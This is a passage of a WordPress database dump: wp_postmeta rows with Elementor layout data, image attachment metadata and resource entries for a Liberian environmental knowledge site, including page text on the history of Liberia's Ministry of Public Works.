up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(13993,2225,'_elementor_controls_usage','a:0:{}'),(13995,2225,'_ca_post_type','1612'),(13996,2224,'_edit_last','1'),(13997,2224,'_elementor_controls_usage','a:0:{}'),(13998,2224,'_ca_handle','0'),(13999,2224,'_ca_host','sidebar'),(14000,2224,'_ca_merge_pos','0'),(14001,2224,'_edit_lock','1573765494:1'),(14002,2227,'_elementor_controls_usage','a:0:{}'),(14004,2227,'_ca_post_type','1614'),(14005,2226,'_edit_last','1'),(14006,2226,'_elementor_controls_usage','a:0:{}'),(14007,2226,'_ca_handle','0'),(14008,2226,'_ca_host','sidebar'),(14009,2226,'_ca_merge_pos','0'),(14010,2226,'_edit_lock','1573765556:1'),(14011,2229,'_elementor_controls_usage','a:0:{}'),(14013,2229,'_ca_post_type','1594'),(14014,2228,'_edit_last','1'),(14015,2228,'_elementor_controls_usage','a:0:{}'),(14016,2228,'_ca_handle','0'),(14017,2228,'_ca_host','sidebar'),(14018,2228,'_ca_merge_pos','0'),(14019,2228,'_edit_lock','1573765606:1'),(14020,2231,'_elementor_controls_usage','a:0:{}'),(14022,2231,'_ca_post_type','1588'),(14023,2230,'_edit_last','1'),(14024,2230,'_elementor_controls_usage','a:0:{}'),(14025,2230,'_ca_handle','0'),(14026,2230,'_ca_host','sidebar'),(14027,2230,'_ca_merge_pos','0'),(14028,2230,'_edit_lock','1573765662:1'),(14029,2232,'_wp_attached_file','2019/11/ci_logo.png'),(14030,2232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:225;s:6:\"height\";i:225;s:4:\"file\";s:19:\"2019/11/ci_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"ci_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(14031,2233,'_wp_attached_file','2019/11/ffi_-logo.png'),(14032,2233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:222;s:6:\"height\";i:227;s:4:\"file\";s:21:\"2019/11/ffi_-logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"ffi_-logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(14033,2234,'_wp_attached_file','2019/11/mpw_logo.png'),(14034,2234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:196;s:4:\"file\";s:20:\"2019/11/mpw_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"mpw_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(14037,2236,'_elementor_controls_usage','a:0:{}'),(14038,2236,'_ca_post_type','mea_resource'),(14039,2237,'_elementor_controls_usage','a:0:{}'),(14040,2237,'_ca_post_type','mea_resource'),(14041,2219,'_elementor_controls_usage','a:0:{}'),(14042,2238,'_elementor_controls_usage','a:0:{}'),(14044,2238,'_ca_post_type','84'),(14045,2239,'_elementor_controls_usage','a:0:{}'),(14047,2239,'_ca_post_type','84'),(14048,2239,'_ca_post_type','87'),(14049,2238,'_ca_post_type','87'),(14050,2240,'_wp_attached_file','2019/11/featured_technology.jpg'),(14051,2240,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:516;s:4:\"file\";s:31:\"2019/11/featured_technology.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"featured_technology-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"featured_technology-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"featured_technology-768x387.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:387;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573761666\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14054,2243,'_elementor_controls_usage','a:0:{}'),(14055,2243,'_ca_post_type','document'),(14056,2242,'_edit_last','1'),(14057,2242,'_elementor_controls_usage','a:0:{}'),(14058,2242,'_ca_handle','0'),(14059,2242,'_ca_host','sidebar'),(14060,2242,'_ca_merge_pos','1'),(14061,2242,'_edit_lock','1573903355:1'),(14064,2245,'_elementor_controls_usage','a:0:{}'),(14065,2245,'_ca_taxonomy','resource_category'),(14066,2246,'_elementor_controls_usage','a:0:{}'),(14067,2246,'_ca_taxonomy','resource_tag'),(14068,2247,'_elementor_controls_usage','a:0:{}'),(14069,2247,'_ca_taxonomy','resource_type'),(14070,2248,'_elementor_controls_usage','a:0:{}'),(14071,2248,'by','EPA'),(14072,2248,'year','2006'),(14073,2248,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/State-of-the-Environment-2006-Liberia.pdf'),(14074,2248,'_pods_cover_image','a:1:{i:0;i:573;}'),(14075,2248,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(14080,2248,'_dp_original','2159'),(14081,2248,'_edit_lock','1670324209:42'),(14082,2248,'_edit_last','42'),(14083,2249,'_wp_attached_file','2019/11/State-of-the-Environment-2006-Liberia.pdf'),(14085,2248,'_pods_attached_document','a:1:{i:0;i:2249;}'),(14102,2251,'_wp_attached_file','2019/11/UNEP-2007-Assessment_solid_waste_liberia.pdf'),(14106,2252,'_elementor_controls_usage','a:0:{}'),(14107,2252,'by','Clara Gallagher, EPA'),(14108,2252,'year','N/A'),(14109,2252,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/UNFCCC-since-COP24.pdf'),(14110,2252,'_pods_cover_image','a:1:{i:0;i:573;}'),(14111,2252,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(14116,2252,'_dp_original','2159'),(14117,2252,'_edit_lock','1670324350:42'),(14118,2252,'_edit_last','42'),(14119,2253,'_wp_attached_file','2019/11/UNFCCC-since-COP24.pdf'),(14121,2252,'_pods_attached_document','a:1:{i:0;i:2253;}'),(14130,2255,'_elementor_edit_mode','builder'),(14131,2255,'_elementor_template_type','wp-post'),(14132,2255,'_elementor_version','2.7.5'),(14133,2255,'_wp_page_template','default'),(14134,2255,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f3255\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"8f526d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30ec225\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f8f5e4b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2f50533\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7dc41ec\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(14136,2256,'_elementor_edit_mode','builder'),(14137,2256,'_elementor_template_type','wp-post'),(14138,2256,'_elementor_version','2.7.5'),(14139,2256,'_wp_page_template','default'),(14140,2256,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f8f5e4b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2f50533\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7dc41ec\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(14142,2257,'_elementor_edit_mode','builder'),(14143,2257,'_elementor_template_type','wp-post'),(14144,2257,'_elementor_version','2.7.5'),(14145,2257,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (14146,2257,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f8f5e4b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"49649b6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2f50533\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7dc41ec\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18db5b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0683179\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2718d87\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc92564\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14148,2258,'_elementor_edit_mode','builder'),(14149,2258,'_elementor_template_type','wp-post'),(14150,2258,'_elementor_version','2.7.5'),(14151,2258,'_wp_page_template','default'),(14152,2258,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public 